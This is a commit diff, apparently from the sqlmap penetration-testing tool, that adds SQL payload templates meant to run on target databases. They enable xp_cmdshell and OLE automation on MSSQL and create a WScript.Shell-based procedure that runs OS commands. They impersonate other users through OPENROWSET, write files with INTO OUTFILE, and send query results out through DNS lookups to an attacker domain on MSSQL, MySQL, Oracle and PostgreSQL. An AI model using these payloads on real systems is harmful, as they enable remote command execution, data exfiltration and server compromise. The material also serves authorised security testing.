Some refactoring (data)

data/procs/README.txt

@@ -0,0 +1,4 @@
+Files in this folder represent SQL snippets used by sqlmap on the target
+system.
+They are licensed under the terms of the GNU Lesser General Public License
+where not specified otherwise.

data/procs/mssqlserver/activate_sp_oacreate.sql

@@ -0,0 +1,4 @@
+EXEC master..sp_configure 'show advanced options',1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'ole automation procedures',1;
+RECONFIGURE WITH OVERRIDE

data/procs/mssqlserver/configure_openrowset.sql

@@ -0,0 +1,6 @@
+EXEC master..sp_configure 'show advanced options', 1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;
+RECONFIGURE WITH OVERRIDE;
+EXEC sp_configure 'show advanced options', 0;
+RECONFIGURE WITH OVERRIDE

data/procs/mssqlserver/configure_xp_cmdshell.sql

@@ -0,0 +1,6 @@
+EXEC master..sp_configure 'show advanced options',1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'xp_cmdshell',%ENABLE%;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'show advanced options',0;
+RECONFIGURE WITH OVERRIDE

data/procs/mssqlserver/create_new_xp_cmdshell.sql

@@ -0,0 +1,3 @@
+DECLARE @%RANDSTR% nvarchar(999);
+set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
+EXEC master..sp_executesql @%RANDSTR%

data/procs/mssqlserver/disable_xp_cmdshell_2000.sql

@@ -0,0 +1 @@
+EXEC master..sp_dropextendedproc 'xp_cmdshell'

data/procs/mssqlserver/dns_request.sql

@@ -0,0 +1,4 @@
+DECLARE @host varchar(1024);
+SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
+EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
+# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')

data/procs/mssqlserver/enable_xp_cmdshell_2000.sql

@@ -0,0 +1 @@
+EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'

data/procs/mssqlserver/run_statement_as_user.sql

@@ -0,0 +1,3 @@
+SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%')

data/procs/mysql/dns_request.sql

@@ -0,0 +1 @@
+SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%'))

data/procs/mysql/write_file_limit.sql

@@ -0,0 +1 @@
+LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- -

data/procs/oracle/dns_request.sql

@@ -0,0 +1,2 @@
+SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL

data/procs/postgresql/dns_request.sql

@@ -0,0 +1,14 @@
+DROP TABLE IF EXISTS %RANDSTR1%;
+# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required
+CREATE TABLE %RANDSTR1%(%RANDSTR2% text);
+CREATE OR REPLACE FUNCTION %RANDSTR3%()
+RETURNS VOID AS $$
+DECLARE %RANDSTR4% TEXT;
+DECLARE %RANDSTR5% TEXT;
+BEGIN
+SELECT INTO %RANDSTR5% (%QUERY%);
+%RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\'';
+EXECUTE %RANDSTR4%;
+END;
+$$ LANGUAGE plpgsql SECURITY DEFINER;
+SELECT %RANDSTR3%();